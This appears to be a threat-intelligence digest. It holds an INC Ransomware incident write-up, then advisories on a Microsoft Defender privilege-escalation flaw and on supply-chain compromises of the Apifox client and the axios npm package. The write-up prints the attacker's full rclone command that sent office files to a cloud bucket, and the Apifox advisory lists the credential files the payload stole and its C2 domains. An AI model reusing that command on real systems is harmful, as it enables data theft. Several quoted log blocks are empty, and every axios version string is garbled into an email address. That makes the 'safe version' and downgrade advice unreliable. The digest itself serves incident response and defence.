The threat actor started by brute-forcing the victim's internet-facing FortiGate management interface. No rate limiting, no account lockout, no MFA. A local admin account fell to credential stuffing from a rotating set of IPs across Russia, Iran, Brazil, and various proxy providers. The login succeeded. Nobody noticed.
About two weeks later, the attacker downloaded the FortiGate configuration backup. FortiGate configs contain local user credentials (often reversible) and full SSL VPN settings. From this single file, the attacker pulled credentials for two accounts:
A stale partner account belonging to a former employee of the victim's managed services provider. Last legitimate login: over two years prior. The employee had left the partner company, but the victim's account was never disabled.
A FortiGate service account with a password unchanged for 1,408 days. This account had Domain Admin privileges.
Two accounts. One forgotten, one over-privileged. Both with passwords sitting in a config file on an internet-facing appliance.
Roughly four weeks after the config download, the attacker logged into the FortiGate GUI and added the stale partner account to the SSL VPN user group. Minutes later, the account connected via VPN. From the SOC's perspective, this looked normal: a known partner account connecting over VPN. No alerts fired because nothing about it was technically anomalous, except that the human behind the account had not worked there in over two years.
The gap between obtaining credentials and using them matters. Weeks of inactivity between the config download and VPN activation suggest the initial access broker who compromised the FortiGate likely sold or handed off access to the INC Ransomware operators during this window, a common pattern in the ransomware-as-a-service ecosystem.
The next day, the operators switched to the FortiGate service account. Domain Admin. Nearly four-year-old password. Interactive login enabled.
The service account started RDP sessions across the environment: file servers, hypervisors, the ERP system, domain controllers, the Veeam backup server. 17 systems in total.
First actions on target were basic reconnaissance, enumerating shares and launching a command shell:

Login records from the domain controller revealed a Kali Linux hostname among the connecting systems, confirming hands-on-keyboard operation from an offensive Linux distribution:

On the Veeam backup server, the attacker reset the backup service account password from the command line. The EDR agent captured it in real time:

This is a deliberate move to slow down recovery and create persistence.
The victim had a commercial EDR solution deployed. But the SQL server holding the organization's critical business data did not have the agent installed. It was only onboarded the day after the attack, likely by the managed services partner scrambling to respond.
This is what attackers look for. They do not need to evade EDR if they can find a server that does not have it. An unmanaged asset with access to sensitive data is the perfect staging point.
Within hours of the first lateral movement, the attacker ran Rclone on the unmonitored SQL server:
rclone.exe copy Z: was4:<bucket>/share--ignore-existing
--transfers=32--multi-thread-streams=32
--multi-thread-cutoff=12M--max-size=25M
--include"*.{xls,pdf,xlsx,doc,docx,txt}"
--max-age=3y --progress -vv
Only office documents and PDFs. Only files from the last three years. 32 parallel streams to maximize throughput.
The firewall captured every PUT request. The user-agent string, rclone/v1.72.1, is right there in the logs, along with the destination hostname:

The exfiltration ran for roughly 21 hours. About 410 gigabytes left the network. No EDR alert, because there was no EDR on that server. The firewall logs recorded the volume, but nobody was watching outbound traffic from a server that had no business talking to cloud storage.
Hours after the exfiltration completed,
win.exe dropped into \Users\Public\Pictures\ and executed the INC Ransomware
The EDR blocked it on every host where it was deployed. The systems without the agent were encrypted.
The incident response team was engaged the following morning. The managed services partner restored 17 VMs from backup.

Every step of this attack exploited a gap that shows up in penetration test reports and audit findings year after year.None of them are hard to understand. All of them are hard to sustain operationally, which is why they persist.
The two dominant initial access vectors in ransomware incidents remain weak or stolen credentials and unpatched vulnerabilities. In this case, credentials alone were enough. Abrute-forced admin panel led to a config file with extractable passwords, which led to a stale account with VPN access, which led to a service account with Domain Admin. Each link in that chain was a credential management failure.
The other pattern: attackers actively seek unmanaged assets. The SQL serverwithout EDR became the exfiltration platform precisely because it was invisible to the security stack. If your tooling does not see a system, that system iswhere the attacker will operate from.
Here are the specific controls that wouldhave broken this attack chain at each stage.
Lockdown network appliance management. Restrict FortiGate admin access to a management VLAN or jump host. The admin panel should never be reachable from the public internet. Enable login attempt throttling and account lockout. Enable MFA on all admin accounts. Audit local accounts quarterly and remove any that are not actively needed.
Control third-party access lifecycle. Require partners to notify you of staffing changes within 48 hours and write it into the service agreement. Run a monthly stale account report: any domain account with nointeractive login in 90 days gets disabled automatically, 180 days deleted. Tag all third-party accounts in AD with a custom attribute (partner name, contract expiry) so they are auditable as a group. Restrict third-party VPN sessions to specific source IP ranges or require client certificate authentication.
Eliminate over-privileged service accounts. Audit every account in Domain Admins, Enterprise Admins, and Administrators. Migrate service accounts to Group Managed Service Accounts (gMSA) with the minimum privileges they actually need. Disable interactive login for service accounts. Enforce a maximum password age of 365 days for any account that cannot use gMSA. A 1,408-day-old password is indefensible.
Achieve 100% EDR coverage. Treat incomplete EDR deployment as a critical finding, not a backlog item. Every server gets the agent, no exceptions. Reconcile EDR agent inventory against your CMDB weekly. Any host inAD or your hypervisor inventory but missing from the EDR console is a gap that needs same-day remediation. Pay extra attention to data-tier servers: SQL, fileservers, NAS, backup servers. These are the exfiltration sources.
Restrict and monitor server egress. Default-deny outbound internet access for all servers. Block cloud storage providers at the firewall for server subnets: Wasabi, Mega, AWS S3 (unless specifically needed), Backblaze, pCloud. There is no reason a SQL server should resolve wasabisys.com. Alert on outbound transfers exceeding a baseline threshold. If a server that normally sends 2 GB/day suddenly pushes 50 GB, that is a detection opportunity.
Protect backup infrastructure. Isolate Veeam and other backup servers on a dedicated management VLAN with strict access controls. Use unique, complex credentials for backup service accounts that are not stored in the same AD as production accounts. Enable immutable backups or air-gapped copies. The attacker changed the Veeam password to prevent recovery. Immutable storage makes that move irrelevant.
BlueHammer is a publicly disclosed zero-day local privilege escalation (LPE) vulnerability affecting Microsoft Windows systems via Microsoft Defender. A working proof-of-concept (PoC) exploit has been released publicly, enabling attackers with low privileges to escalate up to NT AUTHORITY\SYSTEM, effectively gaining full control of the host. This is particularly critical as it impacts fully patched systems, has a low barrier to exploitation, and there is no official patch available to mitigate it. It is important to note that this does require local access to the system along with the ability to execute code as a low-privileged user.
BlueHammer exploits weaknesses in the Microsoft Defender signature update workflow, rather than the scanning engine itself. The vulnerability chain combines a Time-of-Check to Time-of-Use (TOCTOU) race condition with path confusion and symbolic link manipulation, allowing attackers to redirect privileged file operations.
The exploit operates by interacting with Defender’s internal RPC interface (IMpService) to trigger the signature update process. It uses legitimate update behavior by downloading signature files (such as mpasbase.vdm) from Microsoft servers, then uses opportunistic locking (oplocks) to pause execution at a critical moment. During this race window, the attacker replaces expected file paths using NTFS junctions, reparse points, and Object Manager symbolic links, effectively redirecting operations performed by Defender running as SYSTEM. Advanced techniques such as the Windows Cloud Files API and Volume Shadow Copy mechanisms are used to reliably win the race condition. As a result, Defender executes privileged actions on attacker-controlled paths, enabling escalation to SYSTEM-level access.
Impact capabilities include: - SYSTEM-level shell access (hosts) / Administrator-level access (servers) - Credential dumping (e.g., NTLM hashes) - Full system compromise, including persistence and lateral movement
While exploitation requires precise timing and is not fully reliable, it is considered operationally viable and dangerous due to public PoC availability.
No official patch is currently available.
Recommended defensive actions: - Enforce least privilege principles - Restrict local and interactive access - Monitor Defender-related activity and update processes
The Cyber Fusion Center (CFC) is actively monitoring the situation and will issue advisory updates as needed.
A supply chain attack targeting the Apifox desktop client was detected by the SlowMist security team in March 2026. Attackers compromised an official CDN-hosted JavaScript file (apifox-app-event-tracking.min.js), injecting malicious code disguised as analytics tracking functionality. The compromised script was automatically executed by the Electron-based desktop application without requiring user interaction, resulting in the theft of authentication credentials, system information, and API credentials, as well as enabling remote code execution (RCE) capabilities on affected systems.
apifox-app-event-tracking.min.js)CDN Compromise and Script Injection: - The official CDN-hosted file apifox-app-event-tracking.min.js was tampered with at the source, injecting malicious JavaScript into a trusted analytics script - Because Apifox is built on Electron, the desktop application automatically loads this script on every startup and during normal operation, executing the malicious payload without any user action or consent.
Once executed within the Apifox Electron runtime, the payload performed the following actions: - Extracted authentication tokens from the application's local storage, specifically targeting common.accessToken and related session data. - Executed system commands (ps aux on macOS/Linux, tasklist on Windows) to enumerate running processes. - Targeted the following files and directories for exfiltration: - ~/.ssh/ - SSH private and public keys - ~/.git-credentials Git authentication credentials - ~/.zsh_history / ~/.bash_history - Shell command history - ~/.kube/* - Kubernetes cluster configurations and tokens - ~/.npmrc - npm registry authentication tokens - ~/.zshrc - Zsh configuration (may contain secrets) - ~/.subversion/* - SVN credentials - Stolen data transmitted to C2 servers via RSA-encrypted channels, tagged with custom HTTP headers/fields: af_uuid, af_os, af_user, af_name, af_apifox_user, af_apifox_name. - Retrieved and executed arbitrary remote payloads from C2 infrastructure, establishing a persistent backdoor. - A built-in randomized timer triggered continuous data theft and payload fetch cycles throughout the application's runtime.
_rl_headers and _rl_mc keys from Apifox's LevelDB storage via the developer console: localStorage.removeItem(‘_rl_headers’);localStorage.removeItem(‘_rl_mc’);DomainNotesapifox[.]it[.]comPrimary C2 domain, hosted on Cloudflare, active 18 days, now offlinecdn[.]openroute[.]devSecondary C2 / payload deliveryupgrade[.]feishu[.]it[.]comC2 communication endpointsystem[.]toshinkyo[.]or[.]jpC2 communication endpoint*[.]feishu[.]it[.]comWildcard subdomain used for C2ns[.]openroute[.]devDNS infrastructure related to attack
IndicatorValueCompromised Fileapifox-app-event-tracking.min.jsSHA25691d48ee33a92acef02d8c8153d1de7e7fe8ffa0f3b6e5cebfcb80b3eeebc94f1Original Size~34 KBCompromised Size~77 KB
_rl_headers and _rl_mc keys in Apifox LevelDB local storageps aux or tasklist execution spawned from the Apifox/Electron process tree~/.ssh/, ~/.git-credentials, ~/.kube/, ~/.npmrcThe CFC continues to monitor the situation and is in the process of building a threat-hunting campaign to identify related activity. This advisory will be updated if required.
On March 31, 2026, StepSecurity identified a sophisticated supply chain attack involving the compromise of two versions of the popular axios HTTP client library on npm: info@pinebar.org and info@pinebar.org. These versions were published using compromised npm credentials of a lead axios maintainer, bypassing the usual CI/CD pipeline. The attack involved injecting a malicious dependency, info@pinebar.org, which executed a postinstall script deploying a cross-platform remote access trojan (RAT). This RAT targeted macOS, Windows, and Linux systems, establishing a connection with a command-and-control server to deliver platform-specific payloads.
The Safe Version Reference is: info@pinebar.org (safe) · shasum: 7c29f4cf2ea91ef05018d5aa5399bf23ed3120eb
Immediate Actions: - Downgrade to safe axios versions: info@pinebar.org or info@pinebar.org. - Remove plain-crypto-js from node_modules and reinstall dependencies with npm install --ignore-scripts. - Check for RAT artifacts on affected systems and treat them as fully compromised if found.
Preventive Measures: - Use --ignore-scripts in CI/CD pipelines to prevent postinstall hooks from executing. - Block C2 traffic at the network/DNS layer. - Rotate all credentials on systems where the malicious package ran.
For StepSecurity Enterprise Customers: - Use Harden-Runner to enforce network egress allowlists and detect anomalous network traffic. - Deploy StepSecurity Dev Machine Guard for real-time visibility into npm packages installed on developer devices.
The CFC is monitoring the situation and analyzing the case to launch potential threat-hunting campaigns. This advisory will be updated if required.